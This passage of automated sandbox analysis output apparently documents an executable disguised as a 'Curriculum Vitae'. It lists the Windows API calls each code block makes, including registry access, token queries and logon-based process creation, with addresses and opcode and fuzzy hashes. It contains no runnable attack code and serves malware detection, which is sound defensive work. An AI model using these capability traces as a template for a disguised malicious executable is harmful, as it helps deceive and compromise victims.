                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: f0a62f47246aeb2fcbb23e26117d0c090004dc60db8ab23c14987cef9f6cfbd3
                      • Instruction ID: b4936c42a015f723ee1743ecf439163ee76972db9972ffa278318d1f892616fa
                      • Opcode Fuzzy Hash: f0a62f47246aeb2fcbb23e26117d0c090004dc60db8ab23c14987cef9f6cfbd3
                      • Instruction Fuzzy Hash: 0CF01932552A03ABD7415BA4EE88ED6BA29FF01702F482025F206909A0C7749465CFA4
                      APIs
                      • __allrem.LIBCMT ref: 00D600BA
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D600D6
                      • __allrem.LIBCMT ref: 00D600ED
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D6010B
                      • __allrem.LIBCMT ref: 00D60122
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D60140
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1992179935-0
                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                      • Instruction ID: da66c4f19807201aceba773c6e0006f45dee016493192dfa525c99c42572610e
                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                      • Instruction Fuzzy Hash: AF81E772A007069BEB249F68CC41B6B77E9EF41324F28463AF951DB681E774D9448BB0
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D582D9,00D582D9,?,?,?,00D6644F,00000001,00000001,8BE85006), ref: 00D66258
                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D6644F,00000001,00000001,8BE85006,?,?,?), ref: 00D662DE
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D663D8
                      • __freea.LIBCMT ref: 00D663E5
                        • Part of subcall function 00D63820: RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      • __freea.LIBCMT ref: 00D663EE
                      • __freea.LIBCMT ref: 00D66413
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID:
                      • API String ID: 1414292761-0
                      • Opcode ID: 8e65e83da60e4839af847c3f533adcf5ec4b18ab6ced1b23158081a72f20e2ac
                      • Instruction ID: c02e00e1233498af0d32b4a3cf058d6fe61d870443300026737e1522d507ed8f
                      • Opcode Fuzzy Hash: 8e65e83da60e4839af847c3f533adcf5ec4b18ab6ced1b23158081a72f20e2ac
                      • Instruction Fuzzy Hash: BD51BF72A00216ABEB258F64DC81EBF7BA9EF44750F1D462AFD05DA240EB34DC50C6B0
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00DBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DBB6AE,?,?), ref: 00DBC9B5
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBC9F1
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA68
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA9E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DBBCCA
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DBBD25
                      • RegCloseKey.ADVAPI32(00000000), ref: 00DBBD6A
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DBBD99
                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DBBDF3
                      • RegCloseKey.ADVAPI32(?), ref: 00DBBDFF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                      • String ID:
                      • API String ID: 1120388591-0
                      • Opcode ID: 4601011785d84e2d5877fe90bc11576aff447eb98adfa43379bb789b6b1fc5d1
                      • Instruction ID: 1a266ff0e126506a752aeea73038098c446ba4e999fe53843498c7dfe33bc26f
                      • Opcode Fuzzy Hash: 4601011785d84e2d5877fe90bc11576aff447eb98adfa43379bb789b6b1fc5d1
                      • Instruction Fuzzy Hash: 75818D30208241EFC714DF24C891E6ABBE5FF84318F54855DF59A8B2A2CB71ED45CBA2
                      APIs
                      • VariantInit.OLEAUT32(00000035), ref: 00D8F7B9
                      • SysAllocString.OLEAUT32(00000001), ref: 00D8F860
                      • VariantCopy.OLEAUT32(00D8FA64,00000000), ref: 00D8F889
                      • VariantClear.OLEAUT32(00D8FA64), ref: 00D8F8AD
                      • VariantCopy.OLEAUT32(00D8FA64,00000000), ref: 00D8F8B1
                      • VariantClear.OLEAUT32(?), ref: 00D8F8BB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$ClearCopy$AllocInitString
                      • String ID:
                      • API String ID: 3859894641-0
                      • Opcode ID: f4b552a1e8d132de85aa93a23c9c85995cfbdd3fceb3163959aeabd47f6967a2
                      • Instruction ID: cfe685274745287c400b80c81ee56260499e3f962ec20af7992e045a5e224684
                      • Opcode Fuzzy Hash: f4b552a1e8d132de85aa93a23c9c85995cfbdd3fceb3163959aeabd47f6967a2
                      • Instruction Fuzzy Hash: 9851B076A10311BBCF24BB65D895B2DB3A8EF45310F249467E906DF292DB709C40CBB6
                      APIs
                        • Part of subcall function 00D37620: _wcslen.LIBCMT ref: 00D37625
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00DA94E5
                      • _wcslen.LIBCMT ref: 00DA9506
                      • _wcslen.LIBCMT ref: 00DA952D
                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00DA9585
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$FileName$OpenSave
                      • String ID: X
                      • API String ID: 83654149-3081909835
                      • Opcode ID: 6d1b82267e49f2864e9d0afe2a5d4c9992545e0469d30198efb65b9e3f231ee7
                      • Instruction ID: 26a356847f67644a4955e1592b4dbd153f531e1d3d1646b8eb7d1b6a934f1232
                      • Opcode Fuzzy Hash: 6d1b82267e49f2864e9d0afe2a5d4c9992545e0469d30198efb65b9e3f231ee7
                      • Instruction Fuzzy Hash: 8EE180715083409FDB24DF24C491A6AB7E4FF85314F18896DF8899B2A2DB71ED05CBB2
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • BeginPaint.USER32(?,?,?), ref: 00D49241
                      • GetWindowRect.USER32(?,?), ref: 00D492A5
                      • ScreenToClient.USER32(?,?), ref: 00D492C2
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D492D3
                      • EndPaint.USER32(?,?,?,?,?), ref: 00D49321
                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00D871EA
                        • Part of subcall function 00D49339: BeginPath.GDI32(00000000), ref: 00D49357
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                      • String ID:
                      • API String ID: 3050599898-0
                      • Opcode ID: 5a5bc58378a746600405a4a491443344b622da229aa1bb66815890bc3ee3ee8f
                      • Instruction ID: 358ba36eee39fbcd687b53f22e542863b9b2bc06e784f36ff6cb838fb418169b
                      • Opcode Fuzzy Hash: 5a5bc58378a746600405a4a491443344b622da229aa1bb66815890bc3ee3ee8f
                      • Instruction Fuzzy Hash: 78418030104301AFD711DF26DC99FABBBA8EB86320F140269FA949B2A1C7719845DB71
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DA080C
                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DA0847
                      • EnterCriticalSection.KERNEL32(?), ref: 00DA0863
                      • LeaveCriticalSection.KERNEL32(?), ref: 00DA08DC
                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DA08F3
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DA0921
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                      • String ID:
                      • API String ID: 3368777196-0
                      • Opcode ID: 206a3cb00025375fd38fb47f89c6152d1041132da4ba9487c1fab40e9e8b11e0
                      • Instruction ID: 683aba9926ff1ab872cd8a3d5134ef7a9df1bbb07498aa1989a5970558885571
                      • Opcode Fuzzy Hash: 206a3cb00025375fd38fb47f89c6152d1041132da4ba9487c1fab40e9e8b11e0
                      • Instruction Fuzzy Hash: 4C415B71900206AFDF14AF64DC85A6ABBB8FF05300F1480A5ED04DA296D730DE55DBB4
                      APIs
                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00D8F3AB,00000000,?,?,00000000,?,00D8682C,00000004,00000000,00000000), ref: 00DC824C
                      • EnableWindow.USER32(00000000,00000000), ref: 00DC8272
                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00DC82D1
                      • ShowWindow.USER32(00000000,00000004), ref: 00DC82E5
                      • EnableWindow.USER32(00000000,00000001), ref: 00DC830B
                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00DC832F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Show$Enable$MessageSend
                      • String ID:
                      • API String ID: 642888154-0
                      • Opcode ID: 2f438cbd79ae16e5b40b6058f845273390950000f4416acaaadb7f26824dbbd1
                      • Instruction ID: e9e79a9188652a47c8a70bdd764c613d89e34b555901f7069a12c572cb16c2aa
                      • Opcode Fuzzy Hash: 2f438cbd79ae16e5b40b6058f845273390950000f4416acaaadb7f26824dbbd1
                      • Instruction Fuzzy Hash: 0F41A330601646AFDB11CF15C899FA4BBE0FB4A715F1C52ADE5089F2B2CB32A845DF64
                      APIs
                      • IsWindowVisible.USER32(?), ref: 00D94C95
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D94CB2
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D94CEA
                      • _wcslen.LIBCMT ref: 00D94D08
                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D94D10
                      • _wcsstr.LIBVCRUNTIME ref: 00D94D1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                      • String ID:
                      • API String ID: 72514467-0
                      • Opcode ID: d7e5ac20e59077aa68260c17926df46dfe732f50e036a578beecf3efdf2e1cce
                      • Instruction ID: 1004ca358c663a8089d9c007b0b83e43fd177ee35519e15eec08507451b64114
                      • Opcode Fuzzy Hash: d7e5ac20e59077aa68260c17926df46dfe732f50e036a578beecf3efdf2e1cce
                      • Instruction Fuzzy Hash: 73210836604201BFEF255B39ED49E7B7B9CDF45750F148039F909CA2A2EA61DC4297B0
                      APIs
                        • Part of subcall function 00D33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D33A97,?,?,00D32E7F,?,?,?,00000000), ref: 00D33AC2
                      • _wcslen.LIBCMT ref: 00DA587B
                      • CoInitialize.OLE32(00000000), ref: 00DA5995
                      • CoCreateInstance.OLE32(00DCFCF8,00000000,00000001,00DCFB68,?), ref: 00DA59AE
                      • CoUninitialize.OLE32 ref: 00DA59CC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 3172280962-24824748
                      • Opcode ID: 0d046dfc786deaf14d01dd0ac77e8ecf0334b3d6169e3f03642570477959eb48
                      • Instruction ID: 00ae436e6441e3c75e4823c4f4c5bbab4f4036889dd2ba937c433d199bdea219
                      • Opcode Fuzzy Hash: 0d046dfc786deaf14d01dd0ac77e8ecf0334b3d6169e3f03642570477959eb48
                      • Instruction Fuzzy Hash: A1D142756087019FC714DF25D480A2ABBE1FF8A720F14885DF88A9B361DB31ED45CBA2
                      APIs
                        • Part of subcall function 00D90FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D90FCA
                        • Part of subcall function 00D90FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D90FD6
                        • Part of subcall function 00D90FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D90FE5
                        • Part of subcall function 00D90FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D90FEC
                        • Part of subcall function 00D90FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D91002
                      • GetLengthSid.ADVAPI32(?,00000000,00D91335), ref: 00D917AE
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D917BA
                      • HeapAlloc.KERNEL32(00000000), ref: 00D917C1
                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D917DA
                      • GetProcessHeap.KERNEL32(00000000,00000000,00D91335), ref: 00D917EE
                      • HeapFree.KERNEL32(00000000), ref: 00D917F5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                      • String ID:
                      • API String ID: 3008561057-0
                      • Opcode ID: e10e810215ab59ac5e4660922e0cf682ea5ed2f11e7cf2421fbf63cfa28f9347
                      • Instruction ID: cf3f7051f721f207a238959ca9fda266fa07291b1abbb5eeb164ee736eec9e50
                      • Opcode Fuzzy Hash: e10e810215ab59ac5e4660922e0cf682ea5ed2f11e7cf2421fbf63cfa28f9347
                      • Instruction Fuzzy Hash: 8E118636A10307EFDF109FA5CC49FAE7BA9EB41355F184018E586E7220C736A944CB70
                      APIs
                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D914FF
                      • OpenProcessToken.ADVAPI32(00000000), ref: 00D91506
                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D91515
                      • CloseHandle.KERNEL32(00000004), ref: 00D91520
                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D9154F
                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00D91563
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                      • String ID:
                      • API String ID: 1413079979-0
                      • Opcode ID: 86b6bbcaa4ae8c270cac1e7419b601a95c6afac9ab99d1f55572e0143799f640
                      • Instruction ID: 9e27deeab4f0b3c3b60bcad36feb47af9812ef63b0c02052a3de5bdce4faf4b7
                      • Opcode Fuzzy Hash: 86b6bbcaa4ae8c270cac1e7419b601a95c6afac9ab99d1f55572e0143799f640
                      • Instruction Fuzzy Hash: 8811177650024AABDF118F98ED49FDE7BA9FB48744F094015FA09A2160C375CE61AB70
                      APIs
                      • GetLastError.KERNEL32(?,?,00D53379,00D52FE5), ref: 00D53390
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D5339E
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D533B7
                      • SetLastError.KERNEL32(00000000,?,00D53379,00D52FE5), ref: 00D53409
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: f1c9cfecf80f92e7dbe14654d81f8bea3e2a36fec1a951ff5ac789bac5d977c5
                      • Instruction ID: 9b35de3af4572315bf370a38cc21c54cb6f156830bbb67f8b42edd045e0ce741
                      • Opcode Fuzzy Hash: f1c9cfecf80f92e7dbe14654d81f8bea3e2a36fec1a951ff5ac789bac5d977c5
                      • Instruction Fuzzy Hash: 1D016832218312BFEE152774BC81A762A44DB113FB320422DFC10C52F0EF114D1E9578
                      APIs
                      • GetLastError.KERNEL32(?,?,00D65686,00D73CD6,?,00000000,?,00D65B6A,?,?,?,?,?,00D5E6D1,?,00DF8A48), ref: 00D62D78
                      • _free.LIBCMT ref: 00D62DAB
                      • _free.LIBCMT ref: 00D62DD3
                      • SetLastError.KERNEL32(00000000,?,?,?,?,00D5E6D1,?,00DF8A48,00000010,00D34F4A,?,?,00000000,00D73CD6), ref: 00D62DE0
                      • SetLastError.KERNEL32(00000000,?,?,?,?,00D5E6D1,?,00DF8A48,00000010,00D34F4A,?,?,00000000,00D73CD6), ref: 00D62DEC
                      • _abort.LIBCMT ref: 00D62DF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: bad77322ad9015ebf6e7f32cebd96dce3c9c3663ad201966a3678692d75fb443
                      • Instruction ID: cf295b356fc179b68eae60e4b7cfb4defed7231c77952ea82155f629a5b34331
                      • Opcode Fuzzy Hash: bad77322ad9015ebf6e7f32cebd96dce3c9c3663ad201966a3678692d75fb443
                      • Instruction Fuzzy Hash: CFF0C831A44F0227C2122738BC16F7E2659EFC27B1F294419F968D22D6EF2488114AB0
                      APIs
                        • Part of subcall function 00D49639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D49693
                        • Part of subcall function 00D49639: SelectObject.GDI32(?,00000000), ref: 00D496A2
                        • Part of subcall function 00D49639: BeginPath.GDI32(?), ref: 00D496B9
                        • Part of subcall function 00D49639: SelectObject.GDI32(?,00000000), ref: 00D496E2
                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00DC8A4E
                      • LineTo.GDI32(?,00000003,00000000), ref: 00DC8A62
                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00DC8A70
                      • LineTo.GDI32(?,00000000,00000003), ref: 00DC8A80
                      • EndPath.GDI32(?), ref: 00DC8A90
                      • StrokePath.GDI32(?), ref: 00DC8AA0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                      • String ID:
                      • API String ID: 43455801-0
                      • Opcode ID: 50f6051d5973aba0ba706d04b7578e0fd5a8bc2976ba6ce44f0a150fd00927b9
                      • Instruction ID: 325c91af8ca3f18e6e0b0ccb0e70170cf04dab6cff67e5649c65d93733200136
